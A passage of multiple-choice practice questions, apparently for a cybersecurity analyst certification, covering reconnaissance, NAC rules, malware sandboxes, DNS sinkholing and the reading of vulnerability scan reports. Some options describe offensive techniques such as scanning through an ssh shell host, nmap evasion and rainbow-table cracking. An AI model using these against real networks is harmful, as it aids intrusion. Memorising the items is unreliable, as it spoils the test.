3812 root 20 0 23160 3564 2864 R 0.0 0.2 0:00.86 htop 
662 root 20 0 303M 2388 2000 S 0.0 0.1 0:00.56 /usr/sbin/VBoxSer 
1965 root 20 0 1080M 195M 74476 S 0.0 9.7 0:01.31 iceweasel 
932 Debian-gd 20 0 1526M 155M 75364 S 0.0 7.8 0:04.62 gnome-shell --mod 
666 root 20 0 303M 2388 2000 S 0.0 0.1 0:00.44 /usr/sbin/VBoxSer 


187. What issue should Amanda report to the system administrator? 
A. High network utilization 
B. High memory utilization 


C. Insufficient swap space 
D. High CPU utilization 


188. What command could Amanda run to find the process with the highest CPU utilization if 
she did not have access to htop? 


A. ps 
B. top 
C. proc 
D. load 


189. What command can Amanda use to terminate the process? 
A. term 
B. stop 
C. end 
D. kill 


190. During Geoff’s configuration of his organization’s network access control policies, he sets 
up client OS rules that include the following statements: 

ALLOW Windows 7 version *, Windows 10 version * 
ALLOW OSX version * 
ALLOW iOS 8.1, iOS 9 version * 
ALLOW Android 7.* 

After deploying this rule, he discovers that many devices on his network cannot connect. 
What issue is most likely occurring? 

A. Insecure clients 
B. Incorrect NAC client versions 
C. OS version mismatch 
D. Patch-level mismatch 

191. Lauren submits a suspected malware file to malwr.com and receives the following 
information about its behavior. What type of tool is malwr.com? 

Signatures 
A process attempted to delay the analysis task. 
File has been identified by at least one AntiVirus on VirusTotal as malicious 
The binary likely contains encrypted or compressed data. 
Creates a windows hook that monitors keyboard input (keylogger) 
Creates an Alternate Data Stream (ADS) 
Installs itself for autorun at Windows startup 

A. A reverse-engineering tool 
B. A static analysis sandbox 
C. A dynamic analysis sandbox 
D. A decompiler sandbox 

192. Fred has been tasked with configuring his organization’s NAC rules to ensure that 
employees only have access that matches their job functions. Which of the following NAC 
criteria are least suited to filtering based on a user’s job? 

A. Time-based 
B. Rule-based 
C. Role-based 
D. Location-based 
193. Charles is investigating a process that he believes may be malicious. What Linux command 
can he use to determine what files that process has open? 

A. ps 
B. procmap 
C. lsof 
D. filemap 

194. After a popular website is hacked, Chris begins to hear reports that email addresses from 
his company’s domain are listed in the hacker’s data dump. Chris knows that the list 
includes passwords and is concerned that his users may have used the same password for 
the site and their own company account. If the hackers recovered MD5 hashed passwords, 
how can he check them against the strong password hashes his company uses? 

A. Reverse the MD5 hashes and then rehash using the company’s method and compare. 
B. Reverse the MD5 and strong company hashes and then compare the password. 
C. Use rainbow tables to recover the passwords from the dump and then rehash using the 
company’s strong method and compare. 
D. Chris cannot accomplish this task; hashes cannot be reversed. 

195. As part of his active reconnaissance activities, Frank is provided with a shell account 
accessible via ssh. If Frank wants to run a default nmap scan on the network behind the 
firewall shown here, how can he accomplish this? 

[Diagram: External Host; Shell Host: 192.168.34.11; Internal Protected Network 
192.168.34.0-192.168.34.255] 

A. ssh -t 192.168.34.11 nmap 192.168.34.0/24 
B. ssh -R 8080:192.168.34.11:8080 [remote account:remote password] 
C. ssh -proxy 192.168.11 [remote account:remote password] 
D. Frank cannot scan multiple ports with a single ssh command. 
196. Angela captured the following packets during a reconnaissance effort run by her 
organization’s red team. What type of information are they looking for? 

[Packet capture: columns Source, Destination, Protocol, Length, Info] 

A. Vulnerable web applications 
B. SQL injection 
C. Directory traversal attacks 
D. Passwords 
197. Which sources are most commonly used to gather information about technologies a target 
organization uses during intelligence gathering? 
A. OSINT searches of support forums and social engineering 
B. Port scanning and social engineering 
C. Social media review and document metadata 
D. Social engineering and document metadata 
198. Geoff wants to prevent spammers from harvesting his organization’s public LDAP direc- 
tory. What technology should he implement? 
A. A firewall 
B. An IDS 
C. Set hard limits 


D. Require authentication 


199. How can Saria remediate the issue shown here in the MBSA screenshot? 

Microsoft Baseline Security Analyzer 
Some user accounts (4 of 7) have blank or simple passwords, or could not be analyzed. 

A. Force all users to set a complex password. 
B. Set a minimum password age. 
C. Enforce password expiration. 
D. This is not a problem. 

200. Greg configures his next-generation firewall security device to forge DNS responses for 
known malicious domains. This results in users who attempt to visit sites hosted by those 
domains to see a landing page that Greg controls that advises them they were prevented 
from visiting a malicious site. What is this technique known as? 

A. DNS masquerading 
B. DNS sinkholing 
C. DNS re-sequencing 
D. DNS hierarchy revision 

201. While reviewing a malware sample, Adam discovers that code inside of it appears to be 
obfuscated. Which of the following encoding methods is commonly used to prevent code 
from being easily read by simply opening the file? 

A. QR coding 
B. Base64 
C. Base128 
D. XINT 

202. Jennifer is an Active Directory domain administrator for her company and knows that 
a quickly spreading botnet relies on a series of domain names for command and control 
and that preventing access to those domain names will cause the malware infection that 
connects to the botnet to fail to take further action. Which of the following actions is 
her best option if she wants to prevent off-site Windows users from connecting to botnet 
command-and-control systems? 

A. Force a BGP update. 
B. Set up a DNS sinkhole. 
C. Modify the hosts file. 
D. Install an anti-malware application. 

203. Charleen works for a U.S. government contractor that uses NIST’s definitions to describe 
threat categories. How should she categorize the threat posed by competitors that might 
seek to compromise her organization’s website? 

A. Adversarial 
B. Accidental 
C. Structural 
D. Environmental 
204. Chris has been asked to assess the technical impact of suspected reconnaissance performed 
against his organization. He is informed that a reliable source has discovered that a third 
party has been performing reconnaissance by querying WHOIS data. How should Chris 
categorize the technical impact of this type of reconnaissance? 

A. High 
B. Medium 
C. Low 
D. He cannot determine this from the information given. 

205. Frank is creating the scope worksheet for his organization’s penetration test. Which of the 
following techniques is not typically included in a penetration test? 

A. Reverse engineering 
B. Social engineering 
C. Denial-of-service attacks 
D. Physical penetration attempts 

206. Allan needs to immediately shut down a service called Explorer.exe on a Windows 
server. Which of the following methods is not a viable option for him? 

A. Use sc. 
B. Use wmic. 
C. Use secpol.msc. 
D. Use services.msc. 


207. Rick is reviewing flows of a system on his network and discovers the following flow logs. 
What is the system doing? 

ICMP "Echo request" 

Date flow start         Duration Proto Src IP Addr:Port->Dst IP Addr:Port  Packets Bytes Flows 
2017-07-11 04:58:59.518 0.000    ICMP  10.1.1.1:0->10.2.2.6:8.0            11      924 
2017-07-11 04:58:59.518 0.000    ICMP  10.2.2.6:0->10.1.1.1:0.0            11      924 
2017-07-11 04:58:59.518 0.000    ICMP  10.1.1.1:0->10.2.2.7:8.0            11      924 
2017-07-11 04:58:59.518 0.000    ICMP  10.2.2.7:0->10.1.1.1:0.0            11      924 
2017-07-11 04:58:59.518 0.000    ICMP  10.1.1.1:0->10.2.2.8:8.0            11      924 
2017-07-11 04:58:59.518 0.000    ICMP  10.2.2.8:0->10.1.1.1:0.0            11      924 
2017-07-11 04:58:59.518 0.000    ICMP  10.1.1.1:0->10.2.2.9:8.0            11      924 
2017-07-11 04:58:59.518 0.000    ICMP  10.2.2.9:0->10.1.1.1:0.0            11      924 
2017-07-11 04:58:59.518 0.000    ICMP  10.1.1.1:0->10.2.2.10:8.0           11      924 
2017-07-11 04:58:59.518 0.000    ICMP  10.2.2.10:0->10.1.1.1:0.0           11      924 
2017-07-11 04:58:59.518 0.000    ICMP  10.1.1.1:0->10.2.2.11:8.0           11      924 
2017-07-11 04:58:59.518 0.000    ICMP  10.2.2.11:0->10.1.1.1:0.0           11      924 

A. A port scan 
B. A failed three-way handshake 
C. A ping sweep 
D. A traceroute 


208. Ryan’s passive reconnaissance efforts resulted in the following packet capture. Which of the following statements cannot be verified based on the packet capture shown for the host with IP address 10.0.2.4?

No.  Time         Source             Destination        Protocol  Length  Info
1                 CadmusCo_fa:25:8e  Broadcast          ARP       42      Who has 10.0.2.4? Tell 10.0.2.15
2    0.000258663  CadmusCo_92:5f:44  CadmusCo_fa:25:8e  ARP       60      10.0.2.4 is at 08:00:27:92:5f:44
3    0.023177002  10.0.2.15          192.168.1.1        DNS       81      Standard query 0xfeba PTR 4.2.0.10.in-addr.arpa
4    0.047498670  192.168.1.1        10.0.2.15          DNS       81      Standard query response 0xfeba No such name PTR 4.2.0.10.in-addr.arpa
11   5.070143568  CadmusCo_92:5f:44  CadmusCo_fa:25:8e  ARP       60      Who has 10.0.2.15? Te
12   5.070164509  CadmusCo_fa:25:8e  CadmusCo_92:5f:44  ARP       42      10.0.2.15 is at 08:00:27:fa:25:8e

A. The host does not have a DNS entry.
B. It is running a service on port 139.
C. It is running a service on port 445.
D. It is a Windows system.


209. Stacey encountered a system that shows as “filtered” and “firewalled” during an nmap 
scan. Which of the following techniques should she not consider as she is planning her 
next scan? 


A. Packet fragmentation 
B. Spoofing the source address 
C. Using decoy scans 
D. Spoofing the destination address 
210. When Charleen attempts to visit a website, she receives a DNS response from the DNS cache server that her organization relies on that points to the wrong IP address. What attack has occurred?

A. DNS brute forcing
B. ARP spoofing
C. DNS poisoning
D. MAC spoofing


211. Alex has been asked to implement network controls to ensure that users who authenticate 
to the network are physically in the building that the network they are authenticating to 
serves. What technology and tool should he use to do this? 


A. Geo-IP and port security 

B. GPS location and NAC 

C. GPS location and port-security 
D. Geo-IP and NAC 
212. As part of a penetration testing exercise, Lauren is placed on the defending team for her organization. What is this team often called?

A. The red team
B. The white team
C. The blue team
D. The yellow team

213. Lucca wants to lock down a Cisco router, and chooses to use documentation that Cisco provides. What type of documentation is this?

A. Primary documentation
B. OEM documentation
C. Crowd-sourced documentation
D. System documentation





Domain 2: Vulnerability Management

EXAM OBJECTIVES COVERED IN THIS CHAPTER:

2.1 Given a scenario, implement an information security vulnerability management process.
  - Identification of requirements
  - Establish scanning frequency
  - Configure tools to perform scans according to specification
  - Execute scanning
  - Generate reports
  - Remediation
  - Ongoing scanning and continuous monitoring

2.2 Given a scenario, analyze the output resulting from a vulnerability scan.
  - Analyze reports from a vulnerability scan
  - Validate results and correlate other data points

2.3 Compare and contrast common vulnerabilities found in the following targets within an organization.
  - Servers
  - Endpoints
  - Network infrastructure
  - Network appliances
  - Virtual infrastructure
  - Mobile devices
  - Interconnected networks
  - Virtual private networks (VPNs)
  - Industrial Control Systems (ICSs)
  - SCADA devices
1. Kim is preparing to deploy a new vulnerability scanner and wants to ensure that she can get the most accurate view of configuration issues on laptops belonging to traveling salespeople. Which technology will work best in this situation?

A. Agent-based scanning
B. Server-based scanning
C. Passive network monitoring
D. Noncredentialed scanning
2. Carla runs a vulnerability scan of a new appliance that engineers are planning to place on her organization’s network and finds the results shown here. Of the actions listed, which would correct the highest criticality vulnerability?

FreeBSD Based Device
Vulnerabilities (15)

Sev  Title                                                                   Port                   Status
2    SSL Certificate - Expired                                               443/tcp over SSL       New
3    WINS Domain Controller Spoofing Vulnerability - Zero Day                                       Active
3    NetBIOS Name Conflict Vulnerability                                                            Active
3    NetBIOS Release Vulnerability                                                                  Active
2    Hidden RPC Services                                                                            Active
2    NetBIOS Name Accessible                                                                        Active
2    NTP Information Disclosure Vulnerability                                123/udp                Active
2    SSL Certificate - Self-Signed Certificate                               443/tcp over SSL       Active
2    SSL Certificate - Subject Common Name Does Not Match Server FQDN        443/tcp over SSL       Active
2    SSL Certificate - Signature Verification Failed Vulnerability           443/tcp over SSL       Active
1    Presence of a Load-Balancing Device Detected                            443/tcp over SSL       Active
1    Presence of a Load-Balancing Device Detected                            80/tcp                 Active
3    SSL/TLS Compression Algorithm Information Leakage Vulnerability         443/tcp over SSL       Fixed
3    SSL/TLS Server supports TLSv1.0                                         443/tcp over SSL       Fixed
1    SSL Certificate - Will Expire Soon                                      443/tcp over SSL       Fixed

A. Block the use of TLSv1.0.
B. Replace the expired SSL certificate.
C. Remove the load balancer.
D. Correct the information leakage vulnerability.


3. In what type of attack does the adversary leverage a position on a guest operating system to gain access to hardware resources assigned to other operating systems running in the same hardware environment?

A. Buffer overflow
B. Directory traversal
C. VM escape
D. Cross-site scripting
4. Julie is developing a vulnerability scanning approach that will unify the diverse approaches used throughout her organization’s different operating locations. She would like to ensure that everyone uses the same terminology when referring to different applications and operating systems. Which SCAP component can assist Julie with this task?

A. CVE
B. CPE
C. CVSS
D. OVAL


5. Josh is responsible for the security of a network used to control systems within his organization’s manufacturing plant. The network connects manufacturing equipment, sensors, and controllers. He runs a vulnerability scan on this network and discovers that several of the controllers are running very out-of-date firmware that introduces security issues. The manufacturer of the controllers is out of business. What action can Josh take to best remediate this vulnerability in an efficient manner?

A. Develop a firmware update internally and apply it to the controllers.
B. Post on an Internet message board seeking other organizations that have developed a patch.
C. Ensure that the ICS is on an isolated network.
D. Use an intrusion prevention system on the ICS network.


6. Vic scanned a Windows server used in his organization and found the result shown here. The server is on an internal network with access limited to IT staff and is not part of a domain. How urgently should Vic remediate this vulnerability?

3  Administrator Account's Password Does Not Expire
First Detected: 08/04/2015 at 18:02:25 (GMT-0400)  Last Detected: 04/05/2017 at 00:48:55 (GMT-0400)  Times Detected: 22  Last Fixed: N/A
QID: 90080                      CVSS Base: 7.5
Category: Windows               CVSS Temporal: 7.1
CVE ID: -                       CVSS3 Base: -
Vendor Reference: -             CVSS3 Temporal: -
Bugtraq ID: -                   CVSS Environment:
Service Modified: 08/03/2015      Asset Group: -
User Modified: -                  Collateral Damage Potential: -
Edited: No                        Target Distribution: -
PCI Vuln: Yes                     Confidentiality Requirement: -
Ticket State:                     Integrity Requirement: -
                                  Availability Requirement: -
THREAT:
The scanner probed the Security & Accounts Database (SAM) and found that the target Windows box's Administrator account has a password that does not expire.

A. Vic should drop everything and remediate this vulnerability immediately.
B. While Vic does not need to drop everything, this vulnerability requires urgent attention and should be addressed quickly.
C. This is a moderate vulnerability that can be scheduled for remediation at a convenient time.
D. This vulnerability is informational in nature and may be left in place.


7. Gina would like to leverage the Security Content Automation Protocol (SCAP) in her organization to bring a standard approach to their vulnerability management efforts. What SCAP component can Gina use to provide a common language for describing vulnerabilities?

A. XCCDF
B. CVE
C. CPE
D. CCE


8. Rob’s manager recently asked him for an overview of any critical security issues that exist on his network. He looks at the reporting console of his vulnerability scanner and sees the options shown here. Which of the following report types would be his best likely starting point?

Title                                          Vulnerability Data
2008 SANS Top 20 Report                        Host Based
Executive Report                               Host Based
High Severity Report                           Host Based
Payment Card Industry (PCI) Executive Report   Scan Based
Payment Card Industry (PCI) Technical Report   Scan Based
Qualys Patch Report                            Host Based
Qualys Top 20 Report                           Host Based
Technical Report                               Host Based
Unknown Device Report                          Scan Based

A. Technical Report
B. High Severity Report
C. Qualys Patch Report
D. Unknown Device Report


9. Wendy is the security administrator for a membership association that is planning to launch an online store. As part of this launch, she will become responsible for ensuring that the website and associated systems are compliant with all relevant standards. What regulatory regime specifically covers credit card information?

A. PCI DSS
B. FERPA
C. HIPAA
D. SOX


10. During a port scan of a server, Miguel discovered that the following ports are open on the internal network:

- TCP port 25
- TCP port 80
- TCP port 110
- TCP port 443
- TCP port 1433
- TCP port 3389

The scan results provide evidence that a variety of services are running on this server. Which one of the following services is not indicated by the scan results?

A. Web
B. Database
C. SSH
D. RDP


11. Beth is a software developer and she receives a report from her company’s cybersecurity team that a vulnerability scan detected a SQL injection vulnerability in one of her applications. She examines her code and makes a modification in a test environment that she believes corrects the issue. What should she do next?

A. Deploy the code to production immediately to resolve the vulnerability.
B. Request a scan of the test environment to confirm that the issue is corrected.
C. Mark the vulnerability as resolved and close the ticket.
D. Hire a consultant to perform a penetration test to confirm that the vulnerability is resolved.


12. George recently ran a port scan on a network device used by his organization. Which one 
of the following open ports represents the most significant possible security vulnerability? 


A. 22 


B. 23 
C. 161 
D. 443 


Questions 13 through 15 refer to the following scenario:

Harold runs a vulnerability scan of a server that he is planning to move into production and finds the vulnerability shown here.

3  SSL/TLS Server supports TLSv1.0   port 3389/tcp over SSL   CVSS: -  CVSS3: -  Active
First Detected: 09/25/2016 at 01:16:35 (GMT-0400)  Last Detected: 04/09/2017 at 00:58:18 (GMT-0400)  Times Detected: 15  Last Fixed: N/A
QID: 38628                         CVSS Base: 2.6
Category: General remote services  CVSS Temporal: 2.3
CVE ID: -                          CVSS3 Base: -
Vendor Reference: -                CVSS3 Temporal: -
Bugtraq ID: -                      CVSS Environment:
Service Modified: 07/14/2016         Asset Group: -
User Modified: -                     Collateral Damage Potential: -
Edited: No                           Target Distribution: -
PCI Vuln: No                         Confidentiality Requirement: -
Ticket State:                        Integrity Requirement: -
                                     Availability Requirement: -
13. What operating system is most likely running on the server in this vulnerability scan report?

A. macOS
B. Windows
C. CentOS
D. RHEL


14. Harold is preparing to correct the vulnerability. What service should he inspect to identify 
the issue? 


A. SSH 

B. HTTPS 
C. RDP 

D. SFTP 


15. Harold would like to secure the service affected by this vulnerability. Which one of the 
following protocols/versions would be an acceptable way to resolve the issue? 


A. SSL v2.0 
B. SSL v3.0 
C. TLS v1.0 


D. None of the above 


16. Seth found the vulnerability shown here in one of the systems on his network. What component requires a patch to correct this issue?

5  VMware ESXi 5.5.0 Patch Release ESXi550-201703401-SG Missing (KB2149576)   CVSS: -  CVSS3: -  New
First Detected: 04/05/2017 at 21:10:27 (GMT-0400)  Last Detected: 04/05/2017 at 21:10:27 (GMT-0400)  Times Detected: 1  Last Fixed: N/A
QID: 216120                                                      CVSS Base: 6.6
Category: VMware                                                 CVSS Temporal: 4.9
CVE ID: CVE-2017-4902 CVE-2017-4903 CVE-2017-4904 CVE-2017-4905  CVSS3 Base: -
Vendor Reference: VMSA-2017-0006                                 CVSS3 Temporal: -
Bugtraq ID: -                                                    CVSS Environment:
Service Modified: 04/04/2017                                       Asset Group: -
User Modified: -                                                   Collateral Damage Potential: -
Edited: No                                                         Target Distribution: -
PCI Vuln: Yes                                                      Confidentiality Requirement: -
Ticket State: Open                                                 Integrity Requirement: -
                                                                   Availability Requirement: -
THREAT:
THREAT: 


VMware ESXi is an enterprise level computer virtualization product. 

A local user on the guest system can trigger a heap overflow in SVGA to execute arbitrary code on the host system [CVE-2017-4902]. ESXi 6.0 is not affected. 

A local user on the guest system can trigger an uninitialized stack memory usage error in SVGA to execute arbitrary code on the host system [CVE-2017-4903]. 

A local user on the guest system can trigger an uninitialized stack memory usage error in the XHCI controller to execute arbitrary code on the host system [CVE-2017-4904]. On ESXi 5.5, the 
impact is limited to denial of service conditions. 

A local user on the guest system can trigger an uninitialized memory usage error to obtain potentially sensitive information on the host system [CVE-2017-4905]. 


IMPACT: 
A local user on the guest system can gain elevated privileges on the host system. 
A local user on the guest system can obtain potentially sensitive information on the host system. 


SOLUTION: 

To resolve this issue, upgrade to VMware ESXi Build 5230635 or the latest VMware ESXi build. 
Refer to VMware advisory KB2149576 for updates and build information. 

Patch: 

Following are links for downloading patches to fix the vulnerabilities: 

VMSA-2017-0006: VMware ESXi 5.5 


EXPLOITABILITY: 
There is no exploitability information for this vulnerability. 


A. Operating system
B. VPN concentrator
C. Network router or switch
D. Hypervisor


17. Ken is responsible for the security of his organization’s network. His company recently contracted with a vendor that will be using laptops that he does not control to connect to their systems. Ken is concerned because he believes that these laptops contain vulnerabilities. What can he do to best mitigate the risk to other devices on the network without having administrative access to the devices?

A. Apply any necessary security patches.
B. Increase the encryption level of the VPN.
C. Implement a jumpbox system.
D. Require two-factor authentication.


18. Quentin ran a vulnerability scan of a server in his organization and discovered the results shown here. Which one of the following actions is not required to resolve one of the vulnerabilities on this server?

Vulnerabilities (15)
Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32)
Apache Tomcat Input Validation Security Bypass Vulnerability
Built-in Guest Account Not Renamed at Windows Target System
Administrator Account's Password Does Not Expire
Windows Remote Desktop Protocol Weak Encryption Method Allowed
SSL/TLS use of weak RC4 cipher
SSL/TLS Server supports TLSv1.0
SSL/TLS Server supports TLSv1.0
NetBIOS Name Accessible
FIN-ACK Network Device Driver Frame Padding Information Disclosure Vulnerability
SSL Certificate - Subject Common Name Does Not Match Server FQDN
SSL Certificate - Signature Verification Failed Vulnerability
SSL Certificate - Subject Common Name Does Not Match Server FQDN
SSL Certificate - Self-Signed Certificate
SSL Certificate - Signature Verification Failed Vulnerability

A. Reconfigure cipher support.
B. Apply Windows security patches.
C. Obtain a new SSL certificate.
D. Enhance account security policies.
19. The presence of ________ triggers specific vulnerability scanning requirements based upon law or regulation.

A. Credit card information
B. Protected health information
C. Personally identifiable information
D. Trade secret information
Questions 20 through 22 refer to the following scenario:

Stella is analyzing the results of a vulnerability scan and comes across the vulnerability shown here on a server in her organization. The SharePoint service in question processes all of the organization’s work orders and is a critical part of the routine business workflow.

First Detected: 09/28/2015 at 10:42:15 (GMT-0400)  Last Detected: 04/05/2017 at 00:16:12 (GMT-0400)  Times Detected: 20  Last Fixed: N/A
QID: 110235                                        CVSS Base: 9
Category: Office Application                       CVSS Temporal: 7
CVE ID: CVE-2014-0251 CVE-2014-1754 CVE-2014-1813  CVSS3 Base: -
Vendor Reference: MS14-022                         CVSS3 Temporal: -
Bugtraq ID: 67288                                  CVSS Environment:
Service Modified: 09/03/2014                         Asset Group: -
User Modified: -                                     Collateral Damage Potential: -
Edited: No                                           Target Distribution: -
PCI Vuln: Yes                                        Confidentiality Requirement: -
Ticket State: Open                                   Integrity Requirement: -
                                                     Availability Requirement: -
THREAT:
A remote code execution vulnerability exists in Microsoft Web Applications. An authenticated attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the W3WP service account. (CVE-2014-1813).

An elevation of privilege vulnerability exists in Microsoft SharePoint Server. An attacker who successfully exploited this vulnerability could perform cross-site scripting attacks on affected systems and run script in the security context of the logged-on user. (CVE-2014-1754)

Affected Software:
Microsoft SharePoint Server 2007, Microsoft SharePoint Server 2010, Microsoft SharePoint Server 2013, Microsoft Office Web Apps 2010, Microsoft Office Web Apps Server 2013, Microsoft SharePoint Services 3.0, and Microsoft SharePoint Foundation 2010, Microsoft SharePoint Foundation 2013, Microsoft SharePoint Designer 2007, Microsoft SharePoint Designer 2010, and Microsoft SharePoint Designer 2013

This security update is rated Critical for supported editions of Microsoft SharePoint Server.

IMPACT:
The most severe of these vulnerabilities could allow remote code execution if an authenticated attacker sends specially crafted page content to a target SharePoint server.

SOLUTION:
Customers are advised to refer to MS14-022.

Patch:
Following are links for downloading patches to fix the vulnerabilities:
20. What priority should Stella place on remediating this vulnerability?

A. Stella should make this vulnerability one of her highest priorities.
B. Stella should remediate this vulnerability within the next several weeks.
C. Stella should remediate this vulnerability within the next several months.
D. Stella does not need to assign any priority to remediating this vulnerability.


21. What operating system is most likely running on the server in this vulnerability scan report?

A. macOS
B. Windows
C. CentOS
D. RHEL


22. What is the best way that Stella can correct this vulnerability?

A. Deploy an intrusion prevention system.
B. Apply one or more application patches.
C. Apply one or more operating system patches.
D. Disable the service.

23. Harry is developing a vulnerability scanning program for a large network of sensors used by his organization to monitor a transcontinental gas pipeline. What term is commonly used to describe this type of sensor network?

A. WLAN
B. VPN
C. P2P
D. SCADA


24. This morning, Eric ran a vulnerability scan in an attempt to detect a vulnerability that was announced by a software manufacturer yesterday afternoon. The scanner did not detect the vulnerability although Eric knows that at least two of his servers should have the issue. Eric contacted the vulnerability scanning vendor who assured him that they released a signature for the vulnerability overnight. What should Eric do as a next step?

A. Check the affected servers to verify a false positive.
B. Check the affected servers to verify a false negative.
C. Report a bug to the vendor.
D. Update the vulnerability signatures.

25. Natalie ran a vulnerability scan of a web application recently deployed by her organization, and the scan result reported a blind SQL injection. She reported the vulnerability to the developers who scoured the application and made a few modifications but did not see any evidence that this attack was possible. Natalie reran the scan and received the same result. The developers are now insisting that their code is secure. What is the most likely scenario?

A. The result is a false positive.
B. The code is deficient and requires correction.
C. The vulnerability is in a different web application running on the same server.
D. Natalie is misreading the scan report.

26. Frank discovers a missing Windows security patch during a vulnerability scan of a server in his organization’s data center. Upon further investigation, he discovers that the system is virtualized. Where should he apply the patch?

A. To the virtualized system
B. The patch is not necessary
C. To the domain controller
D. To the virtualization platform
27. Andrew is frustrated at the high level of false positive reports produced by his vulnerability scans and is contemplating a series of actions designed to reduce the false positive rate. Which one of the following actions is least likely to have the desired effect?

A. Moving to credentialed scanning
B. Moving to agent-based scanning
C. Integrating asset information into the scan
D. Increasing the sensitivity of scans
28. Joe is conducting a network vulnerability scan against his data center and receives reports from system administrators that the scans are slowing down their systems. There are no network connectivity issues, only performance problems on individual hosts. He looks at the scan settings shown here. Which setting would be most likely to correct the problem?

Advanced

General Settings
  [x] Enable safe checks
      Stop scanning hosts that become unresponsive during the scan
      Scan IP addresses in a random order

Performance Options
      Slow down the scan when network congestion is detected
      Use Linux kernel congestion detection
      Network timeout (in seconds)                      5
      Max simultaneous checks per host                  5
      Max simultaneous hosts per scan                   30
      Max number of concurrent TCP sessions per host
      Max number of concurrent TCP sessions per scan

A. Scan IP addresses in a random order
B. Network timeout (in seconds)
C. Max simultaneous checks per host
D. Max simultaneous hosts per scan


29. Brenda runs a vulnerability scan of the management interface for her organization’s DNS service. She receives the vulnerability report shown here. What should be Brenda’s next action?

2  Cookie Does Not Contain The "secure" Attribute   port 80/tcp   Active
First Detected: 08/22/2016 at 20:52:54 (GMT-0400)  Last Detected: 08/23/2016 at 05:03:18 (GMT-0400)  Times Detected: 2  Last Fixed: N/A
QID: 150122
Category: Web Application
CVE ID: -
Vendor Reference: -
Bugtraq ID: -
Service Modified: 06/14/2016
User Modified: -
Edited: No
PCI Vuln: Yes
Ticket State:
THREAT:
The cookie does not contain the "secure" attribute.

A. Disable the use of cookies on this service.
B. Request that the vendor rewrite the interface to avoid this vulnerability.
C. Investigate the contents of the cookie.
D. Shut down the DNS service.
30. Donna is prioritizing vulnerability scans and would like to base the frequency of scanning on the information asset value. Which of the following criteria would be most appropriate for her to use in this analysis?

A. Cost of hardware acquisition
B. Cost of hardware replacement
C. Types of information processed
D. Depreciated hardware cost

31. Laura is working to upgrade her organization’s vulnerability management program. She would like to add technology that is capable of retrieving the configurations of systems, even when they are highly secured. Many systems use local authentication, and she wants to avoid the burden of maintaining accounts on all of those systems. What technology should Laura consider to meet her requirement?

A. Credentialed scanning
B. Uncredentialed scanning
C. Server-based scanning
D. Agent-based scanning


32. Javier discovered the vulnerability shown here in a system on his network. He is unsure what system component is affected. What type of service is causing this vulnerability?

2  Microsoft SQL Server Compact 3.5 Service Pack 2 Not Installed
First Detected: 09/28/2015 at 10:42:15 (GMT-0400)  Last Detected: 04/05/2017 at 04:43:21 (GMT-0400)
QID: 105487                                                        CVSS Base: 9.3
Category: Security Policy                                          CVSS Temporal: 6.9
CVE ID: -                                                          CVSS3 Base: -
Vendor Reference: Description of SQL Server Compact 3.5 Service Pack 2   CVSS3 Temporal: -
Bugtraq ID: -                                                      CVSS Environment:
Service Modified: 11/04/2015                                         Asset Group: -
User Modified: -                                                     Collateral Damage Potential: -
Edited: No                                                           Target Distribution: -
PCI Vuln: Yes                                                        Integrity Requirement: -
Ticket State:                                                        Availability Requirement: -

A. Backup service
B. Database service
C. File sharing
D. Web service


33. Alicia runs a vulnerability scan of a server being prepared for production and finds the vulnerability shown here. Which one of the following actions is least likely to reduce this risk?

4  OpenSSH AES-GCM Cipher Remote Code Execution Vulnerability
QID: 42420
Category: General remote services
CVE ID: CVE-2013-4548
Vendor Reference: gcmrekey.adv
Bugtraq ID: 63605
Service Modified: 06/16/2015
User Modified: -
Edited: No
PCI Vuln: Yes
Ticket State:

THREAT:
... Mode of Operation (GCM) cipher is used for the key exchange. When an AES-GCM cipher is used, the mm_newkeys_from_blob() function in monitor_wrap.c does not properly initialize memory for a MAC context data structure, allowing remote authenticated users to bypass intended ForceCommand and login-shell restrictions via packet data that provides a crafted callback address.

The new cipher was added only in OpenSSH 6.2, released on March 22, 2013.

Affected Software:
OpenSSH 6.2 and OpenSSH 6.3 when built against an OpenSSL that supports AES-GCM.

IMPACT:
A remote authenticated attacker could exploit this vulnerability to execute arbitrary code in the security context of the authenticated user and may therefore allow bypassing restricted shell/command configurations.

SOLUTION:
Update to OpenSSH 6.4 (http://www.openssh.com/txt/release-6.4) to remediate this vulnerability.

Workaround:
As a workaround, customers may disable AES-GCM in the server configuration. The following sshd_config option will disable AES-GCM while leaving other ciphers active:

Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc

Patch:
Following are links for downloading patches to fix the vulnerabilities:
OpenSSH 6.4 (http://www.openssh.com/txt/release-6.4)

COMPLIANCE:
Not Applicable

EXPLOITABILITY:
There is no exploitability information for this vulnerability.

ASSOCIATED MALWARE:
There is no malware information for this vulnerability.

RESULTS:
SSH-2.0-OpenSSH_6.2 detected on port 22 over TCP.

A. Block all connections on port 22.
B. Upgrade OpenSSH.
C. Disable AES-GCM in the server configuration.
D. Install a network IPS in front of the server.
34. After scanning his organization’s email server, Frank discovered the vulnerability shown here. What is the most effective response that Frank can take in this situation?


Microsoft Exchange Client Access Server Information Di... 


Description 


The Microsoft Exchange Client Access Server (CAS) is affected by an information disclosure vulnerability. 
A remote, unauthenticated attacker can exploit this vulnerability to learn the server's internal IP address. 


Solution 


There is no known fix at this time. 


See Also 


http://foofus.net/?p=758 


Output 


Nessus was able to verify the issue with the following request : 


GET /autodiscover/autodiscover.xml HTTP/1.0 

Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1

Accept-Language: en 

Connection: Close 

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) 
Pragma: no-cache 

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* 


Which returned the following IP address : 
192.168.0.111 


Port v Hosts 


443 / tcp / www 


Plugin Details 

Severity: Medium 

ID: 77026 

Version: $Revision: 1.2 $ 
Type: remote 

Family: Windows 
Published: 2014/08/06 
Modified: 2015/09/24 


Risk Information 


Risk Factor: Medium 
CVSS Base Score: 5.0 


CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N 

CVSS Temporal Vector: CVSS2#E:ND/RL:U/RC:ND 

CVSS Temporal Score: 5.0 


Vulnerability Information 


CPE: cpe:/a:microsoft:exchange_server 
Exploit Available: true 

Exploit Ease: Exploits are available 
Vulnerability Pub Date: 2014/08/01 
Exploited by Nessus: true 


